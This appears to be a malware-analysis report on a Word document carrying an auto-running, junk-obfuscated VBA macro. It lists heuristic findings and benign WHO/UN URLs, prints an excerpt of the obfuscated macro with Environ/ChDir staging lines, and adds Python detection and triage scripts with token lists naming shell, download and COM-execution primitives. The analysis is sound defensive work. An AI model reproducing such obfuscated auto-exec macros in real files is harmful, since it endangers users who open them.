Malware Insights
The file carries VBA macros in the ThisDocument module, including a Document_Open routine, so code runs as soon as the document is opened. Macro source was recovered (about 195 KB), and the compiled p-code stream independently matches the auto-execution-plus-execution-token heuristic: shell, download or object-creation primitives sit alongside the trigger, and they would still be caught if the source were stomped or could not be extracted. The visible source is padded with junk under random dictionary-word names: declarations that are never used, empty conditionals, and calls to objects that are not defined anywhere in the visible source. Among the few lines that matter, Environ() resolves an environment variable whose name is passed in by the caller and ChDir() switches into that directory, a typical setup for staging a second-stage payload in a user-writable location. No such payload or download URL is visible in the preview, so the download-and-execute conclusion rests on the p-code tokens rather than on an observed URL. The many URLs extracted all come from the document body, point to WHO/UN public-health reports, and were classified as benign or unknown; no malicious indicators were found in the document text or in the scripts themselves.
Heuristics (5)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro: the code runs automatically when the document is opened |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (environment variable access) |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URLs. Every URL listed below was reached through the document text (OLE body), none through the macro. Several entries are line-wrapped fragments of the entry before them (for example the trailing `gpw-` and `PIIS2214-` forms), which inflates the count.

- http://www.who
- http://www.childmortality.org/files_v21/download/IGME%20report%202017%20child%20mortality%20final.pdf
- http://aidsinfo.unaids/
- http://www.haiweb.org/medicineprices/
- https://washdata.org/sites/default/files/documents/reports/2018-01/JMP-2017-report-final.pdf
- https://washdata.org/sites/default/files/documents/
- http://www.ncdrisc.org/
- http://applications.emro
- http://apps.who
- http://www.childmortality.org/
- http://whohbsagdashboard.com/
- http://whohbsagdashboard.com/#global-strategies
- https://creativecommons.org/licenses/by-nc-sa/3.0/igo
- http://apps.who.int/iris
- http://apps.who.int/bookorders
- http://www.who.int/about/licensing
- http://www.who.int/about/what-we-do/gpw-thirteen-consultation/en/
- http://www.who.int/about/what-we-do/gpw-
- http://www.who.int/gho/en/
- http://www.who.int/gho/en
- http://www.who.int/gho/publications/world_health_statistics/2017/en/
- https://www.researchgate.net/publication/304576854_Guidelines_for_Accurate_and_Transparent_Health_Estimates_Reporting_The_GATHER_statemen
- https://www.researchgate.net/publication/304576854_
- http://www.who.int/neglected_diseases/diseases/en/
- http://apps.who.int/nha/database/Select/Indicators/en
- http://apps.who.int/
- http://www.who.int/gho/publications/world_health_
- http://www.who.int/reproductivehealth/publications/monitoring/maternal-mortality-2015/en/
- http://www.who.int/reproductivehealth/publications/
- http://www.thelancet.com/journals/langlo/article/PIIS2214-109X(17)30325-X/fulltext
- http://www.thelancet.com/journals/langlo/article/PIIS2214-
- https://data.unicef.org/wp-content/
- http://www.un.org/en/development/desa/population/theme/family-planning/cp_model.shtml
- http://www.un.org/en/
- https://esa.un.org/unpd/wpp/Download/Standard/Fertility/
- https://esa.un.org
- http://www.who.int/healthinfo/global_burden_disease/estimates/en/index3.html
- http://www.who.int/healthinfo/global_
- http://www.who.int/gho/hiv/en/
- http://www.who.int/
- http://www.unaids.org/sites/default/files/media_asset/Global_AIDS_update_2017_en.pdf
- http://www.unaids.org/sites/default/files/media_asset/Global_
- http://www.who.int/malaria/publications/world-malaria-report-2017/en/
- http://www.who.int/malaria/publications/world-malaria-
- http://www.who.int/tb/publications/global_report/en/
- http://www.who.int/tb/publications/global_
- http://apps.who.int/iris/bitstream/handle/10665/255016/9789241565455-eng.pdf?sequence=1
- http://apps.who.int/gb/ebwha/pdf_files/WHA66/A66_20-en.pdf?ua=1
- http://www.who.int/gho/neglected_diseases/en/
- http://www.who.int/gho/neglected_diseases/
- +68 more URL(s)
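As an added illustration of how a rule like OLE_VBA_PCODE_AUTOEXEC_EXEC can be reproduced (this is example code written for this page, not the analyzer's implementation), the script below scans raw OLE streams for auto-execution names next to shell, download and object-creation primitives, in both ASCII and UTF-16LE so that p-code identifier tables and string literals are both covered. The token lists, the severity mapping and the two sample byte strings are assumptions made here; `scan_file` additionally assumes the `olefile` package is installed.

```python
"""Added example: a minimal stand-in for the OLE_VBA_PCODE_AUTOEXEC_EXEC rule.
Not the analyzer's implementation; token lists, severity mapping and the two
sample byte strings are assumptions made for this page."""
import re

AUTOEXEC = ("Document_Open", "AutoOpen", "Auto_Open", "AutoExec",
            "Workbook_Open", "Document_Close", "AutoClose")
EXEC_TOKENS = {
    "shell": ("Shell", "WScript.Shell", "ShellExecute"),
    "download": ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "ADODB.Stream"),
    "object": ("CreateObject", "GetObject"),
    "env": ("Environ", "ChDir"),   # low-severity context, not an execution token
}


def _pattern(token):
    """Match the token as ASCII or UTF-16LE: p-code identifier tables are ASCII,
    string literals in the stream are often UTF-16LE, and VBA names are
    case-insensitive."""
    return re.compile(b"(?:%s|%s)" % (re.escape(token.encode("ascii")),
                                       re.escape(token.encode("utf-16-le"))), re.I)


PATTERNS = {t: _pattern(t) for toks in (AUTOEXEC,) + tuple(EXEC_TOKENS.values()) for t in toks}


def scan_stream(data):
    """Return the auto-exec and execution tokens present in one raw stream."""
    found = {"autoexec": [t for t in AUTOEXEC if PATTERNS[t].search(data)]}
    for cat, toks in EXEC_TOKENS.items():
        found[cat] = [t for t in toks if PATTERNS[t].search(data)]
    return found


def severity(found):
    """Assumed mapping modelled on the report: trigger plus shell/download/object
    primitive is the high-confidence combination, either alone rates medium,
    environment access alone rates low."""
    exec_hit = any(found[c] for c in ("shell", "download", "object"))
    if found["autoexec"] and exec_hit:
        return "high"
    if found["autoexec"] or exec_hit:
        return "medium"
    if found["env"]:
        return "low"
    return None


def scan_file(path):
    """Apply scan_stream to every stream under a VBA storage of an OLE file.
    Assumes the olefile package; imported lazily so the demo runs without it.
    The compressed source half of a module stream will not match here, which is
    why this rule complements rather than replaces source extraction."""
    import olefile
    ole = olefile.OleFileIO(path)
    try:
        report = {}
        for entry in ole.listdir(streams=True, storages=False):
            if any(part.upper() == "VBA" for part in entry[:-1]):
                found = scan_stream(ole.openstream(entry).read())
                report["/".join(entry)] = (severity(found), found)
        return report
    finally:
        ole.close()


# Constructed bytes standing in for a module stream: an ASCII identifier table
# carrying the auto-exec name, a UTF-16LE literal naming a COM server, and filler
# bytes where p-code opcodes would sit. Not taken from the real sample.
PCODE_LIKE = (b"\x00\x01\x00\x0dDocument_Open\x00\xff\x10\x00"
              + "WScript.Shell".encode("utf-16-le") + b"\x00\x00\x11"
              + b"URLDownloadToFile\x07\x00Environ\x00")
BENIGN_LIKE = b"\x00\x01\x00FormatTable\x00" + "Selection.Font".encode("utf-16-le")

if __name__ == "__main__":
    for name, blob in (("pcode_like", PCODE_LIKE), ("benign_like", BENIGN_LIKE)):
        found = scan_stream(blob)
        print(name, severity(found), found)
```

Run it over the streams under the `Macros/VBA` storage when `olevba` fails to recover source, or alongside it. A stream that matches only `Environ`/`ChDir` rates low on its own, exactly as the report's separate OLE_VBA_ENVIRON finding does; it becomes interesting when the trigger and an execution primitive are found in the same stream.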
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 195590 bytes | 1a44aa7c8294f8c82cfdfd04d2b4b07fab4f759acfb61c5b708c70b1de70990b |
Preview script: first 1,000 lines of the extracted script (cut short below)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim pleader_elastomer As String, havocstilbs As String
Sub educatabilityalumna(educatability)
Dim platbandsnumberer As Variant
Dim prigumbilicus
Dim taxi_agriculture
Call dulcianas.defoliation(platbandsnumberer, "apoplexy diker", "apparatus brittlestar", platbandsnumberer, "Caledonian clawback colonnades detonation Rotarianism")
Dim supranationalismconventionalities As Boolean
Dim edging_adventurer As Long
Dim turntableattics As Long
If prigumbilicus >= buckhounds.disquietude(13947, 17634, prigumbilicus) Then
dahl.acariasis supranationalismconventionalities
contadino.cental
End If
If platbandsnumberer <= supranationalismconventionalities Then
End If
Dim tab_odoriferousness
Dim measure_cenogenesis
Dim soreheadforgiveness As Boolean
soreheadforgiveness = brandering.electioneering(supranationalismconventionalities)
Call burnsides.carter(15909, 24581)
Dim kavaiceskater
Dim blockhouses_weazand
Dim rammerowelty
Dim longitudesimplements As String
Dim Vicmillefleurs
Call drapes.cankers(4525, "buntlines Alanbrooke clockwatcher", 30068, "detoxifications barkeepers cultus")
Dim crams_reversers As String
Dim raider_niellists As Boolean
Dim gourmet_foyers As Variant
Dim dunny_Roxana
Dim Lautrectularaemia
raider_niellists = 26065
If raider_niellists < dimwits.Nilotic("eggcups Corneille buckboards", gourmet_foyers) Then
Dim potophites
Dim delegationconsistences
Dim scribblersmoquette As String
Dim dissentient_ayres
If dunny_Roxana <= clamminess.belle(raider_niellists) Then
If potophites = causing.amphipod(6453, 25364, 19697, gourmet_foyers, potophites) Then
raider_niellists = "corruptionists bethel chine"
doucepere.admonitions
delegationconsistences = actings.disparager(21977, dissentient_ayres)
Dim gharry_ascus
Dim binnacles_Volkslied As Boolean
Dim codonrancheries
Dim bellarmines_ironings
dissentient_ayres = "Cynewulf Cara audiences Taoism cytotoxin consuetudinaries"
Dim oc_popup As String
Dim prognosissquirrels As Long
Dim Charlottetown_craziness As Boolean
dunny_Roxana = "coacervation causa"
End If
gourmet_foyers = desorptions.confectionery(prognosissquirrels, "adjutant convertor", 1189, raider_niellists, 3212)
End If
bimonthly.carbonadoes 16540, 1913
Dim sealyhamdoabs As Long
Dim pentaprismimpost As String
Dim whamming_arachnoid
binnacles_Volkslied = barbarian.dioxide(delegationconsistences, Chippendale.bedizenment("basket andesine debaucheries Seeger consonants", 7638, 3230), whamming_arachnoid)
scribblersmoquette = bathtubs.denouncers("crossquestions Trojans cursoriness Parisian cavy buddles", whamming_arachnoid, "Essequibo Keble diatribe Flanders drabness", scribblersmoquette)
borrowers.McCartney "coughers Grappelli bucktooth", binnacles_Volkslied
codonrancheries = 12864
End If
Dim baguette_subtype
Dim triptyquestatu As Boolean
If scribblersmoquette >= Insectivora.elucidation Then
Dim lotionequator
Dim noncom_subwarden
Dim firmness_santal As Integer
Dim thermoclinesdharna As Variant
chlorofluorocarbon.Jeremy "citification diarrhoea Monegasques clecks"
oc_popup = 20862
End If
Dim monotheists_TracksTotal
Dim philatelist_bronchus As Integer
Dim profanitygarrya
profanitygarrya = "desperate bathymetry Salem Treviso Cainite"
Dim muddlersgratulation
Dim hellershraddha As String
Dim myologytedders
Dim logogriphsocc As Boolean
Call diarist.cloudcuckooland("Dumbarton baker daiquiris dozen Pentecost")
If myologytedders < philatelist_bronchus Then
crucifixions.carpetbag
End If
cribbiting.Apuleius profanitygarrya , "Arafat aloes divider bibs Ormandy circumflexes", 14609
muddlersgratulation = 27241
philatelist_bronchus = 4348
crams_reversers = Environ(educatability)
ChDir (crams_reversers)
Dim buyoutwaterrates As String
Dim propagandism_flumes As Variant
Dim soixanteneuf_sp
```
... (truncated)
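The preview shows the obfuscation style: random dictionary-word identifiers, declarations that are never used, comparisons against calls to objects that are never defined, and empty If blocks, with the two lines that matter (`Environ` and `ChDir`) buried among them. The script below is an added example, not the analyzer's code or anything from the sample, of reducing such a module with a crude backward slice: seed on calls that touch the runtime, pull in the assignments that feed them, then treat any procedure with a non-empty slice as interesting in its own right so that its callers are caught too. `SAMPLE_VBA` is constructed from fragments of the preview; the `Document_Open` body and the `"TEMP"` argument are assumptions, since the real call site lies beyond the first 1,000 lines.

```python
"""Added example for this page: a crude backward slice of junk-padded VBA.
Not the analyzer's code. SAMPLE_VBA is constructed from preview fragments;
the Document_Open body and the "TEMP" argument are assumptions."""
import re

PROC_START = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(([^)]*)\)", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.I)
IDENT = re.compile(r"[A-Za-z_]\w*")
# Calls that reach the environment, filesystem, processes or COM (assumed seed list).
SENSITIVE = re.compile(
    r"\b(?:Environ|ChDir|ChDrive|Shell|CreateObject|GetObject|Kill|MkDir|Open|Put|"
    r"Write|Close|FileCopy|SetAttr|CallByName)\b", re.I)

SAMPLE_VBA = """\
Attribute VB_Name = "ThisDocument"
Dim pleader_elastomer As String, havocstilbs As String
Sub educatabilityalumna(educatability)
Dim platbandsnumberer As Variant
Dim prigumbilicus
Call dulcianas.defoliation(platbandsnumberer, "apoplexy diker", "apparatus brittlestar")
Dim supranationalismconventionalities As Boolean
If prigumbilicus >= buckhounds.disquietude(13947, 17634, prigumbilicus) Then
dahl.acariasis supranationalismconventionalities
End If
Dim crams_reversers As String
Dim raider_niellists As Boolean
raider_niellists = 26065
Call burnsides.carter(15909, 24581)
crams_reversers = Environ(educatability)
ChDir (crams_reversers)
Dim buyoutwaterrates As String
End Sub
Sub Document_Open()
Dim whamming_arachnoid
whamming_arachnoid = "TEMP"
educatabilityalumna whamming_arachnoid
End Sub
"""


def _params(raw):
    """'ByVal a As String, b' -> ['a', 'b']."""
    out = []
    for chunk in raw.split(","):
        words = [w for w in chunk.split() if w.lower() not in ("byval", "byref", "optional")]
        if words:
            out.append(words[0])
    return out


def split_procs(src):
    """Return [(name, params, body_lines)] for every Sub/Function in the module.
    Line continuations ('_') are not joined; the preview does not use them."""
    procs, name, params, body = [], None, [], []
    for line in src.splitlines():
        start = PROC_START.match(line)
        if start:
            name, params, body = start.group(1), _params(start.group(2)), []
        elif PROC_END.match(line) and name is not None:
            procs.append((name, params, body))
            name = None
        elif name is not None:
            body.append(line.strip())
    return procs


def slice_proc(body, params, extra=None):
    """Keep lines that call something sensitive (or a procedure already known to
    be interesting), then pull in every assignment that feeds a kept line.
    Control flow around the kept lines is dropped: this is a triage view."""
    keep = {i for i, ln in enumerate(body)
            if SENSITIVE.search(ln) or (extra and extra.search(ln))}
    while True:
        needed = {w.lower() for i in keep for w in IDENT.findall(body[i])}
        grew = set()
        for i, ln in enumerate(body):
            m = ASSIGN.match(ln)
            if m and i not in keep and m.group(1).lower() in needed:
                grew.add(i)
        if not grew:
            break
        keep |= grew
    inputs = [p for p in params if p.lower() in needed]   # values supplied by the caller
    return {"kept": [body[i] for i in sorted(keep)], "inputs": inputs, "total": len(body)}


def triage(src):
    """Slice every procedure, iterating until the set of interesting procedures
    (those with a non-empty slice) stops growing, so their callers get pulled in."""
    procs = split_procs(src)
    interesting, results = set(), {}
    while True:
        extra = (re.compile(r"\b(?:%s)\b" % "|".join(map(re.escape, sorted(interesting))), re.I)
                 if interesting else None)
        results = {n: slice_proc(b, p, extra) for n, p, b in procs}
        now = {n for n, r in results.items() if r["kept"]}
        if now == interesting:
            return results
        interesting = now


if __name__ == "__main__":
    for name, r in triage(SAMPLE_VBA).items():
        print("%s: %d of %d lines kept, inputs=%s" % (name, len(r["kept"]), r["total"], r["inputs"]))
        for ln in r["kept"]:
            print("    " + ln)
```

On the real 195 KB module the seed list is the thing to tune: if a slice comes back empty, the obfuscator is reaching the runtime through something not in `SENSITIVE` (a `CallByName` with a constructed string, a late-bound object returned by `CreateObject`), and the strings feeding those calls are the next place to look. The `inputs` field is what turns `Environ(educatability)` from a dead end into a lead: it names the parameter the analyst has to trace back to the caller.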